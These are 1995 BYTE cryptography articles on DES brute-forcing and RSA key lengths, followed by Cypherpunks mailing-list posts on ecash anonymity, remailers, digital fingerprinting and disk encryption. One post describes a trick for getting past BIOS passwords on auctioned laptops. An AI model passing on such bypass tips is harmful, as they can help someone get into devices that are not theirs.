DES in one day. This machine could be reprogrammed to attack other DES-like ciphers. Linden Technology (Austin, TX) is currently exploring manufacturing new 4-Mb DRAMs with the 1024 associative processors built onto the chip. The effect of brute-force attacks on DES is also important for Unix security, which stores each password after passing it through DES 25 times. At log-in, you type your password; it's encrypted 25 times and the result compared against the password file. If it matches, the system grants you access. Because the password file doesn't contain the passwords themselves, unauthorized users can't use the file to recover them directly. They must use a brute-force machine. However, the brute-force attack can be relatively successful against Unix, because the keyspace is smaller. Most users limit their passwords to alphabetic characters, occasionally adding numbers. This makes searching for passwords much faster; it could be done quite quickly with an associative-memory parallel processor. One estimate suggests that a computer using 512 of Linden's chips could test all six-character alphanumeric passwords in 15 minutes. Clearly. the Unix password structure needs to be rethought in light of today's machines and code-breaking techniques. Because of this new vulnerability, you may want to explore other, newer ciphers. such as Merkle's Khufu or Schneier's Blowfish. The classified Skipjack algorithm buried inside the U.S. government's Clipper and Capstone encryption chips also uses S-boxes, but little is known about their design. There's little reliable public information about RSA Data Security's RC-4. Anyone who uses these algorithms must be prepared to trust the wits of the designers, because the algorithms have not undergone the intensely thorough and long-time public scrutiny given to DES. Many organizations have opted to continue with DES, but the current state of the art is triple-DES -- three passes of the algorithm with either 112- or 168-bit keys. This effectively guards against both brute-force and differential analysis attacks. These users can rest assured that, paradoxically, all the attacks focused on DES continues to keep it strong. ----- Peter Wayner is a BYTE consulting editor living in Baltimore, MD. You can reach him on the Internet at pcw at access.digex.net, on BIX as pwayner at bix.com, or on the World Wide Web at http://access.digex.net/~pcw/ pcwpage.html. ----- Byte, October, 1995, p. 78. Factoring in Public-Key's Future Long thought nearly unbreakable, public-key cryptogratphy is yielding to attack. The secret of security here is key length. By Bruce Schneier Factoring large numbers is hard but not as hard as it used to be. This has grave implications for the effectiveness of public key cryptocraphy, which relies on the difficulty of factoring long keys for its security. But how long is long enough'? In 1976, Richard Guy wrote: "I shall be surprised if anyone regularly factors numbers of size 10^80 without special form during the present century." In 1977, Ron Rivest said that factoring a 125-digit number would take 40 quadrillion years. In 1994, a 129-digit number was factored. The lesson here is that making predictions is foolish. Today, 512-bit keys are common. Factoring them, thus destroying their security, is well within the range of possibility for today's computing resources. A weekend- long worm on the Internet could do it. Computing power is measured in MIPS-years: a million-instructions-per-second computer running for one year, or about 3 x 10^13 instructions. A 100-MHz Pentium is about a 50-MIPS machine; a 1600-node Intel Paragon is about 50,000 MIPS. In 1983, a Cray X-MP supercomputer factored a 71-digit number in 0.1 MIPS-years, using 9.5 CPU hours. That's expensive. Factoring the 129-digit number in 1994 required 5000 MlPS-years and used the idle time on 1600 computers around the world over an eight-month period. Although it took longer, it was essentially free. Those two computations used what's called the *quadratic sieve*, but a newer, more powerful algorithm has arrived. The *general number filed sieve* is faster than the quadratic sieve for numbers well below 116 digits and can factor a 512-bit number over 10 times faster -- it would take less than a year to run on an 1800-node Intel Paragon. And the process gets still faster. Mathematicians keep coming up with new tricks, new optimizations, and new techniques. A related algorithm, the special number field sieve, can already factor numbers of a specialized form (not generally used for cryptography) much faster. So we can probably optimize the general number field sieve to run that fast. For all we know, the National Security Agency is already doing it. The figure "MIPS Years Needed to Factor" gives the number of MlPS-years required to factor "special" and "general" numbers of different lengths. How Big Is Big Enough? The wise cryptographer is ultraconservative when choosing key lengths for a public-key system. You must consider the intended security, the key's expected lifetime, and the current state of the factoring art. Now you need a 1024-bit number to get the same security you got from a 512-bit number in the early 1980s. If you want your keys to remain secure for 20 years, 1024 bits is probably too short. Consider these assumptions from the mathematicians who factored RSA-129: We believe we could acquire 100,000 machines without superhuman or unethical efforts and without an Internet womm or virus. Many organizations have several thousand machines on the Net. Using their facilities would require diplomacy but should not be impossible. Assuming an average power of 5 MIPS and one year elapsed time, we could reasonably embark on a project that would require half a million MIPS-years. The project to factor the 129-digit number harnessed an estimated 0.03 percent of the Internet's total computing power. A well-publicized project might be able to harness 2 percent of the world's computing power for a year. My recommendations for public-key lengths are given in the figure "Recommended Public-Key Key Lengths" according to how long you require the key to be secure. There are three key lengths given for each period -- one secure against an individual cryptanalyst who can get his hands on 10,000 MlPS-years, one against a major corporation that could harness 10^7 MIPS-years, and the third secure against a major govemment and 10^9 MIPS-years. These figures assume that computing power will increase by a factor of 10 every five years and that mathematical advances will let us factor numbers at the speeds of the special number field sieve. Not everyone will agree with these final recommendations. The National Institute of Standards and Technology has mandated 512- to 1024-bit keys for its Digital Signature Standard. PGP has a maximum RSA key length of 1280 bits. Aljen Lenstra, the world's most successful factorer, refuses to predict beyond 10 years. There's always the possibility that an advance in factoring will surprise me as well, though I tried to factor everything into my calculations. But why trust me? I just proved my own foolishness by making predictions. _______________________________________________________ MIPS Years Needed to Factor _______________________________________________________ Ascending Line of General Number Field Sieve Ascending Line Special Number Field Sieve Y-axis: MIPS-years 10^0, 10^3, 10^6, 10^9, 10^12, 10^15, 10^18, 10^21 X-axis: Bits 512, 768, 1024, 1280, 1536, 2048 _______________________________________________________ _______________________________________________________ Recommended Public-Key Key Lengths _______________________________________________________ Ascending bars for: Individual, Company, Government Y-axis: Bits 0, 500, 1000, 1500, 2000, 2500 X-axis: Year 1995 2000 2005 2010 2015 _______________________________________________________ ----- Bruce Schneier is the author of Applied Cryptography (John Wiley), the second edition of which is due out in December. He can be reached on the Internet as schneier at winternet.com, or on BIX c/o editors at bix.com. ----- From tcmay at got.net Fri Sep 15 18:20:21 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 18:20:21 PDT Subject: why ecash is traceable Message-ID: At 10:49 PM 9/15/95, Nick Szabo wrote: >Hal & Tim have made some interesting comments about payee untraceability. >I suspect it will clarify things to point out the orthogonality in >two of the major design choices: > >* Clearing: Offline vs. online >* Settlement: Deposit to payee's account vs. sending new cash to payee > >Because DigiCash wants their product to have payer, but not payee, privacy, >the current ecash(tm) software from DigiCash uses online clearing >and deposit to payee's account, but the three other combinations are >also quite doable if somebody wanted to implement them. The design that >allows symmetric untraceability combines online clearing with sending new >cash. This way the bank need not ID the payee Bob in order to credit Thanks, Nick, for summarizing this clearly in terms of these two axes. This symmetric untraceability is what I was getting at with my point about Bob clearing the transaction and getting back blinded cash. It's apparent that if Alice can get untraceable cash, and she tells her bank to go ahead and give the same kind of untraceable cash to Bob, then Bob can also get untraceable cash. .... >Offline clearing requires the potential to ID the payer in >order to punish double-spending after the fact. Offline clearing has many hurdles to overcome, and this "True Name" (ID) issue is not very attractive. Fortunately, the vast increases in Net speeds are on the side of online clearing, even for relatively small transactions. >Online systems without observers (such as ecash(tm)) don't >need to worry about trying to find multiple spenders, because this is >prevented by the online clearing. In fact, purposeful second-spending >is used to recover from some error conditions, specifically to determine >whether the payee in fact received the "coin" or not when there has been a >network error in the middle of a transaction. Distinguishing between >mistaken and fraudulent double spending is a very complex, not completely >tractable problem, so the current ecash(tm) punts it, which is reasonable >because it is online. An offline system would need an elaborate Sounds pretty compelling to me to concentrate on online clearing systems.... I can imagine limited needs for offline clearing, such as road toll systems, or parking tokens, etc. The amounts of money there can be somewhat limited, and the implications of double spending revealing identity are less serious. (Though I can imagine a worrisome scenario where a highway toll system "deliberately double spends" received tokens to track motorists...there may be precautions built into such systems that I just don't know about.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From stewarts at ix.netcom.com Fri Sep 15 18:27:20 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Sep 95 18:27:20 PDT Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD Message-ID: <199509160125.SAA26600@ix7.ix.netcom.com> >Hmmmm... If memory serves, a year or so ago there was just such a schism >when a prominent cypherpunk split off and formed the "cypherWONKS" list. :-) :-) And starting a new list lets us decided on a new LOGO to replace that old tacky rose-and-bits thingy :-) Cryptographic Professionals for Social Responsibility Cryptographic Industry Association National Steganography Alliance Cryptographers for Foreign Reflexivity Extremely Private Institute for Cryptography NII Institute of Cryptography American Cryptographic Legal Union Free Banking Institute Cryptographic Defense Taskforce Cryptographic Organization for Privacy and Security Entropy, Steganography, and Cryptography Research Organization for Women (If anything, what we need is a way to separate the technical/mathematical discussions from rants like this, but any time we get the list focused on mostly technical issues, the government goes out of its way to do something egregiously stupid or offensive...) Somewhat more seriously, though, there are times that it's useful to have a more respectable-sounding organization (or at least a letterhead...), that's open to participation by members and not just directors (which has been some people's concern about the EFF, CDT, EPIC, and maybe TAP or CPSR.) If none of those are respectable/accessible/non-socialist enough for you, and the British Cryptographic Privacy Association (or whatever their name was) can't be found or sounds too much like International Outside Agitators, and the various academic groups are too busy being academicly respectable to do political agitation ("CryptoAcademics Write Papers!"), then come up with a name and a Postscript letterhead, and start an email list that you can gateway to cypherpunks (as long as you can prevent duplications or mail-floods.) If the main goal is to have a calmer name and mostly the same activities, an alter-ego mailing list is one approach. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From nelson at crynwr.com Fri Sep 15 18:41:07 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 15 Sep 95 18:41:07 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) In-Reply-To: <9509151948.AA27938@cs.umass.edu> Message-ID: Date: Fri, 15 Sep 1995 15:48:14 -0400 (EDT) From: futplex at pseudonym.com (Futplex) Lance Cottrell writes: > 4) There will always be a free version of the client with source code. Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do, I suspect he may not have much legal leeway in this regard. There *will* always be a free version of the client with source code, but the proprietary improvements will probably not be merged into the free version. Lance, and only Lance, as copyright holder, has the publish the code under a different copyright. It's the same thing that Phil Z. did with ViacryptPGP. -- -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 (9201 FAX) | America neither a Christian, Potsdam, NY 13676 | Jewish, Islamic, nor atheist (etc&) nation. This is good. From klbarrus at infocom.net Fri Sep 15 19:20:13 1995 From: klbarrus at infocom.net (Karl L. Barrus) Date: Fri, 15 Sep 95 19:20:13 PDT Subject: Explaining Zero Knowledge to your children Message-ID: <199509160221.VAA29670@infocom.net> At 08:18 PM 9/14/95 +0200, you wrote: >There is a paper about explaining Zero Knowledge methods in simple >words. It's titled "Explainig Zero Knowledge Authentication to your >children" or something similar. I think you are refering to Quisquater's (sp?) explanation, which is in terms of Ali Baba and a magic cave. A functionally similar explanation is in Schneier's Applied Crypto, pp. 85-86. -- Karl L. Barrus From tedwards at Glue.umd.edu Fri Sep 15 19:25:22 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Fri, 15 Sep 95 19:25:22 PDT Subject: Washington D.C. Cyperhpunks Meeting Cybercast Message-ID: Catch the WashDC Cypherpunks meeting cybercast on CU-SeeMe tommorow, saturday Sept. 16 starting at 3:00 PM on the www.digex.net (205.197.247.33) reflector. CU-SeeMe software is videconferencing for PCs and Macs and can be found at ftp.gated.cornell.edu -Thomas From jsimmons at goblin.punk.net Fri Sep 15 20:03:14 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Fri, 15 Sep 95 20:03:14 PDT Subject: Quantum computing info? Message-ID: <199509160259.TAA03727@goblin.punk.net> Could anyone point me to information on 'quantum' computing? -- Jeff Simmons jsimmons at goblin.punk.net From loki at obscura.com Fri Sep 15 21:27:23 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 21:27:23 PDT Subject: Why ecash is traceable Message-ID: At 9:46 AM 9/15/95, Timothy C. May wrote: >At 8:47 AM 9/15/95, Donald M. Kitchen wrote: >>-----BEGIN PGP SIGNED MESSAGE----- >> >>Excellent discussion on the subject, actually. However, your idea of >>the "first person to the bank" maintaining anonymity via remailer block >>is flawed. First of all, if a collusion with the bank is being taken into >>account, presumably sufficient enough resources are involved that someone >>may try and track the reply block. Mixmaster (as your messages mentioned >>by name) would be necessary to eliminate the chance of tracking the block >>through combinations of replay attacks etc. (Which reminds me, has anyone > >Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have >nothing against Mixmaster, but "mix" is the term Chaum invented for what we >later started to call a "remailer." > >--Tim May > Indeed Chaum's phrase "digital mix" was the inspiration for the name Mixmaster. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 21:35:39 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Fri, 15 Sep 95 21:35:39 PDT Subject: Why ecash is traceable In-Reply-To: <199509150532.WAA08865@jobe.shell.portal.com> Message-ID: <199509160435.WAA26877@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Hal wrote: > > But this correlation is what makes the coin traceable. Suppose Alice is > paying a coin to Bob via an anonymous network, and she and the bank > are going to try to figure out who he really is. She goes through the > payment transaction, and Bob sends his resulting data to the bank. > Before doing so, though, Alice simulates a payment of the same coin to > Charlie. Charlie doesn't actually have to be involved, Alice can just > go through what she would have done if she had spent the coin elsewhere. > The result of this simulated payment has been shared with the bank. > > Now, when Bob deposits his data, the bank compares it with the data > Alice sent, the result of her simulated spending of the same coin. By > the argument presented above, Bob's deposit will be flagged. It will > correlate with the data Alice sent in since this will be the equivalent > of a double-spending. So when Bob makes the deposit he can be linked to > the specific coin payment which Alice made, and his anonymity is lost. So Alice/TheBank are able to tell that the nym whom Alice gave the coin to is the same as the nym who deposited it. If Bob has a pseudonymous account at the bank, and it was the same pseudonymous account that he used in the transaction with Alice, then they haven't learned anything new, but if he wants to use one pseudonym when dealing with Alice and another to deposit the coin he got from her then he has problems. That's the extent of the damage, right? Seems like it can be prevented by laundering the coin through a single pseudonym first. That is: Bob receives the coin from Alice, calling himself "CyberBob". He deposits the coin with the bank as a one-time-nym "Nym#2837004", then he has that nym withdraw the same amount of money from its account (closing out the account) and transfers it to the nym which will actually keep the money, "NormalBob". He destroys the new blinding factors after the temporary nym has withdrawn the coin, he deposits the coin with the bank as "NormalBob", and now he is in the clear. Am I missing anything? If Bob's transaction with Alice was actually pseudonymous rather than anonymous then he can just deposit the coin using the same pseudonym and they haven't learned anything new. Once he has done that he can safely transfer the money to any other nym of his with no risk (except for traffic analysis, physical surveillance, yadda yadda yadda). So current (DigiCash "ecash") Chaumian protocol leads to complete anonymity/pseudonymity (there oughta be a word for that. "self-nym-control"?) in the case that pseudonymous accounts are allowed at the Bank. Now one could move this "double-blinding" (isn't that phrase already in use?) trick into the cash protocol itself, possibly gaining a performance win. DigiCash is apparently aware of this possibility, but (rightly) doesn't consider it important to develop right now. Regards, Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4 iQCVAwUBMFpTOfWZSllhfG25AQHndAQAuOfz4Fohl3e/4Q3eUKKY2nZNG+TdDQEN FvW1q1KAuGTeGJoNmL6qD4xkV1wXuT7UScN/7BwU+8SsIh3B5Cb834saGsCTjNtb 8EV2zsYqzdJkJ3DuDHQw785gqrNPokug4KPP4LRMt5N+PnPRTAWnq6PRibegsg86 ypFcUOVbLTU= =K+5k -----END PGP SIGNATURE----- From sameer at c2.org Fri Sep 15 21:50:58 1995 From: sameer at c2.org (sameer) Date: Fri, 15 Sep 95 21:50:58 PDT Subject: Why ecash is traceable In-Reply-To: <199509160435.WAA26877@nagina.cs.colorado.edu> Message-ID: <199509160445.VAA13597@infinity.c2.org> This looks as though you are simulating the 'deposit-and-get-coinage-back' within a 'deposit-and-have-account-credited' system. I figure that they would make the transaction cost involved in creating an account sufficiently high that this plan would be defeated-- or they wouldn't allow psuedonymous accounts. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From don at cs.byu.edu Fri Sep 15 21:51:32 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Fri, 15 Sep 95 21:51:32 PDT Subject: Why ecash is traceable Message-ID: <199509160450.WAA13662@bert.cs.byu.edu> Re: ecash being non-tracable if anon accounts are allowed... And if not, a market will probably develop to launder ecash. Don From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 21:52:18 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Fri, 15 Sep 95 21:52:18 PDT Subject: Bad sig from Cypherpunk auto-signer Re: DD, pedaphiles, and Terrorists, oh my In-Reply-To: <199509150006.UAA17827@book.hks.net> Message-ID: <199509160452.WAA27949@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Hm. Observe the bad signature from the "Cypherpunk signing agent". Sorry if I should have limited this to Lucky and the auto-signer, but I thought y'all might be interested in this as either an attack or false positive. (My bet is on the false positive, of course.) Bryce, signatures at end P.S. I have seen no kiddie porn of any type on the Net. Oh wait, I saw some once that advertised itself as "young girls" performing fellatio, but they looked to be adults as far as I could tell. P.P.S. I wonder if a "pedaphile" would be a teacher fetishist? And a "pedephile"-- for feet? - -----BEGIN PGP SIGNED MESSAGE----- In article <9509141640.AA30602 at zorch.w3.org>, hallam at w3.org wrote: >We never used to see kiddie porn on the internet. The net would go balistic if a >picture of a teen age nude was posted. Recently there has been a flood of ha > rd >core paedophile material. There has always been nude teens on the net. The kind of pictures the most casual observer can take at any Mediteranian beach at any given day in the Summer. There is no real kiddy porn readily available on the net. I looked long and hard. Its a red herring. ANYBODY on this list seen some real kiddy porn on the net? I am talking intercourse, etc., not scans of six year olds from the Sears catalog, or naked boys building sandcastles on the beach. - - -- - - -- Lucky Green PGP encrypted mail preferred. - - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ =pjLL - -----END PGP SIGNATURE----- signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4 iQCVAwUBMFpXdfWZSllhfG25AQFDYQQAuC01Z3tVy9Eu8GIWl850AqxTcPES3yGN TqSZ7vT5VRVKyzJCE4Jpaosx7ndaeDnD6DkCPY6AxSeMDmN+lkKT2RZT76H0Mvvx All9WAyetrB9p7QRAk5hxdHIantRi+z3F8akQR8SN7IVmh/QSWJMk0rKJqLtcbyQ inF14sTWjgk= =clgc -----END PGP SIGNATURE----- From iagoldbe at csclub.uwaterloo.ca Fri Sep 15 21:57:41 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Fri, 15 Sep 95 21:57:41 PDT Subject: Quantum computing info? In-Reply-To: <199509160259.TAA03727@goblin.punk.net> Message-ID: <43dlf6$d07@calum.csclub.uwaterloo.ca> In article <199509160259.TAA03727 at goblin.punk.net>, Jeff Simmons wrote: >Could anyone point me to information on 'quantum' computing? Try http://vesta.physics.ucla.edu/~smolin/index.html. - Ian "hoping this new mail2news gateway works in reverse as well" From jcaldwel at iquest.net Fri Sep 15 22:30:29 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Fri, 15 Sep 95 22:30:29 PDT Subject: Digital Fingerprinting Message-ID: On 12 Sep 95 at 11:27, Andrew Loewenstern wrote: > Such technology would be very useful in business, especially the > high-tech industry. Think of how many non-disclosure agreements > are signed every day relating to new products developed for the > software industry alone. Many companies are very paranoid and > already 'fingerprint' information by using unique code-names for > projects, for instance. i.e. the spec sheet on their new GAK > crypto product they give to Alice may be code-named 'project foobar' > but the one they give to Bob may be code-named 'project burris'... > Then, when the information leaks out they check which person they > gave the document with that code-name and they know who to sue (or > at least not give any more trade-secrets to). It's very simplistic > but it has been know to work in the past. > > Most of the real technology for doing this is much better, of > course... However, what stops you from printing out a > fingerprinted document and scanning it back in, for instance? Well, there is selective wording, mispellings, punctuation and formatting. These can be corrected easily if allowed to be transported as a text or common file type. Another way is to place the document in a PItA proprietary graphical format for transport and viewing only, stego identifier imbedded if you chose * , so that every portion of the document has some indentifier imbedded in it. Many obvious and many devious. Electronic drawings with a harmless and useless circuit(s) added on , software with do nothing code (by design!:) ). Difficult and time consuming to do, but for megabuck items, no prob. Automated for an additional fee of course. Start a service industry for such, make money, pay me back by running a fast, reliable remailer. Idea is to make the thief go to some major effort and if the scanning option is used to make the deletions as obvious and telling as the former identifier. > andrew note* Makes a neat way of putting copyright & source information in picture and sound files, somewhat useless but every trip up helps. From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 23:28:12 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Fri, 15 Sep 95 23:28:12 PDT Subject: e$: Progress and Freedom Conference this Summer In-Reply-To: Message-ID: <199509160628.AAA02261@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Also check out Progress & Freedom Foundation's WWW site. http://www.pff.org/ This is Newt Gingrich's organization by the way in case anyone didn't know that. Bryce, signatures at end rah at shipwright.com (Robert Hettinga) wrote: > > There was a pointer here to an article in the NYT or WSJ about the > conference this summer of the Progress and Freedom Foundation, with muchos > net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth, > etc.) in attendence. Topics were mostly about e$ and the > causes/consequences thereof. > > I just saw this thing on CSPAN, and I thought it was way cool. Here's how > to get it from CSPAN in case they don't run it again. > > Ask for Tape number 57759-63 > CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00 > > > CSPAN > Department 53 > Washington, DC 20055 > > In case I botched something above, or you want to put this on your favorite > book-entry transaction account ;-), CSPAN's phone number is 202-737-3220 signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4 iQCVAwUBMFpuW/WZSllhfG25AQEDCAQAgyG5dc4do3mer1SlremULsoyJEgq9IZe 1ICplfjoMu3mYaSX9PCkcWgoXg3FtqSf3KN6mRZiGwp0CBk1lrSC/YBzOZfG/6gJ 7QmUv2HlDVbmE/O7vX+SjXd1iNlUoymGsiKxZk/TRAZUibb/s2CHYnrGm4mxe4y6 /RBeygqWVP8= =81iV -----END PGP SIGNATURE----- From alano at teleport.com Fri Sep 15 23:45:55 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Sep 95 23:45:55 PDT Subject: laptop passwords Message-ID: <199509160645.XAA29809@desiree.teleport.com> At 01:22 PM 9/15/95 -0800, you wrote: >I've got a dilema. > 2 laptops that I just purchased at a police auction have passwords, >from what I can tell they are passworded at the cmos level. I would normaly >just pull out the battery and clear the cmos but these are laptops and I'm >not to comfortable about doing that. Any ideas? > >laptop1 - Toshiba Satelite Pro T2400CT >laptop2 - Epson Action Note 500 c I am not familiar with those models, but if they work like a regular AMI bios, try hitting ctrl-alt-delete at the password prompt. On many passworded bios it will get you right past it. That will at least give you enough info to see if there is anything worth saving. (I have no problem giving out that trick since I have found most bios passwords pretty useless unless used against the most clueless of users.) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From alano at teleport.com Fri Sep 15 23:57:36 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Sep 95 23:57:36 PDT Subject: Digital Fingerprinting Message-ID: <199509160657.XAA02345@desiree.teleport.com> At 12:28 PM 9/15/95 +5, you wrote: >Another way is to place the document in a PItA proprietary graphical >format for transport and viewing only, stego identifier imbedded if >you chose * , so that every portion of the document has some >indentifier imbedded in it. Many obvious and many devious. Electronic >drawings with a harmless and useless circuit(s) added on , software >with do nothing code (by design!:) ). Difficult and time consuming >to do, but for megabuck items, no prob. Automated for an additional >fee of course. Start a service industry for such, make money, pay me >back by running a fast, reliable remailer. I seem to remember a software piracy case from a number of years back. The case was settled by Apple showing that their code had been copied by the copyright "easteregg" hidden in the roms. Made for a quick and effective demonstration in court. (The story may be apocryphal, but it makes for an example as to how such things do have a (supposed) valid use in protecting code from being snagged by other companies.) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From edgar at highnrg.sbay.org Sat Sep 16 03:19:14 1995 From: edgar at highnrg.sbay.org (Edgar Swank) Date: Sat, 16 Sep 95 03:19:14 PDT Subject: SecureDrive News - Win95 yes, Iomega zip drive no Message-ID: -----BEGIN PGP SIGNED MESSAGE----- SecureDrive Users, I have seen inquires here and received direct e-mail enquirinq about SecureDrive and WIN95, and the Iomega zip disk. I have recently heard from users that SecureDrive 1.3d does work on Windows 95, although it does force it into "DOS Compatibility Mode", which is a performance hit on disk access. I've also heard that LOGIN does not work from a WIN95 DOS window, so has to be issued outside of Windows. I haven't heard anything specific about SecureDrive 1.4, but I believe it should work the same as 1.3d on WIN95. I'm sorry to report that SecureDrive does not support the Iomega ZIP drive. I believe that's because the TSR driver supplied with the hardware does not support a DiskBIOS interface. I had thought that Secure Device, another real-time encryption system, would support this drive, since it works through a device driver mapped to a dos file. But an actual trial proved otherwise. The problem is that the DOS file must be present when the CONFIG.SYS DEVICE= statement for the SECDEV.SYS is processed. But the zip drive driver is a TSR that doesn't get loaded until after all DEVICE statements have been processed. There's no particular reason that Iomega couldn't have written their driver as an MSDOS device driver rather than a TSR, in which case SecureDevice would probably work, but they didn't, so it doesn't. Hope this info is helpful. If any of you discover any interesting new facts using SecureDrive, please let me know. Edgar W. Swank -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFirU94nNf3ah8DHAQEEHAQAg4IB1XDQdFIxHto1iTPpORjuubUdhRzD t8MT350E0KZVCMSj+Vh4y4wEPw2dmms/QY1iMxuwVV/lja+l9yHaRPuxpi5EjQdv Mi8Sk73M/gcL35TTjUli5dnjzHsJ6uYt5Q51j7s0EspJ1qprQlSlgmNvvOTqDgyf /he5BfEfAU4= =GXYT -----END PGP SIGNATURE----- --- edgar at HighNRG.sbay.org Keep Freestyle Alive! From aba at dcs.exeter.ac.uk Sat Sep 16 03:27:07 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sat, 16 Sep 95 03:27:07 PDT Subject: CYPHERPUNK considered harmful Message-ID: <14439.9509161026@exe.dcs.exeter.ac.uk> David Lambert writes: > > Peter Trei wrote: > > > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > > nutcases for many people, and are a barrier to getting our ideas > > across. I'm not saying this pigeonholing is correct - in fact I despise > > people who judge a book by it's cover, but so many people DO make such > > snap judgements that we need to take this into account when talking to > > the general public. > > Two of the responses to the "An opportunity..." post unapologetically > admitted that they refused to read the text of the message due to the > presence of the word "cypherpunk" in the first sentence. > > Shows you what we're up against. > > BTW, I'm not for changing the name of the list, but I do see the logic > in a more establishment-friendly name to use when lobbying the public. There is likely some truth to the cypherpunk turning some people off before they listen, but also as has already been said 'cypherpunks' has it advantages too: catchy, gets the media imagination, and has an established reputation, and set of accomplishmensts. One thing I have been thinking would be nice would be a USENET newsgroup, as mailing lists are a step away from easy access which some people never make. It makes it less easy to browse and see what it's about, interacting with majordomo software might seem very intuitive to most members, but not all will be so comfortable signing up their mailbox (which they possibly pay for per K), and may indeed lack the expertise required to do the job. There are serveral archives of cpunks, but these don't tend to be as well known as newsgroups. More people might come across cypherpunks ideas, and the technology for remailers, disk encryptors, discussions of nym servers, steganorgraphy, IPSEC, etc if they were in a newsgroup, perhaps even within the comp, soc, or sci hierarchies. One thing I have discovered in myself is a reluctance to subscribe to too many mailing lists, as the volume, and management of the resulting traffic piped your way can be overwelming (yes I know there are various filters to split off traffic into separate mbox files). I think it is a shame that things like the nym server discussion which sounded very interesting to me got split off into a separate group, I'd just as soon see the discussion here, for reluctance to subscribe to yet more groups reasons, and because it sounded like it wasn't very high volume anyway. Same for the stego group discussions. If it's all in one place at least I can skim that for interesting things. Both of those discussions I think would contribute to the signal ratio here. But, Peter's stated aims sound useful, of promulgating cypherpunks technolgy, and ideas to as large an audience as possible. Definately a very important aim, and one that lots of people already devote some time and thought to. Might I suggest that a newsgroup would be a way to go? There are already a number of security, privacy, and crypto related groups, but they tend to have their own pattern of flow, you know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno not read much), alt.security.pgp pgp usage, David Sterlight fueled discussions, some ITAR stuff, talk.politics.crypto, crypto politics, comp.org.eff.talk, there must be a few others. Peter's FAQ like document was very nicely worded for avoidance of any connotations of conspiracy or 'punkery' which might put off the less adventurous souls, the more conservative. How about it? Reckon cypherpunks as a group has enough readers to hmm, push through a vote for group creation, if the majority thought it was a useful exercise. A group soley for what? cypherpunks technology, social impacts and education, a place where someone would go with security questions, and to learn about the future of personal and corporate security on the 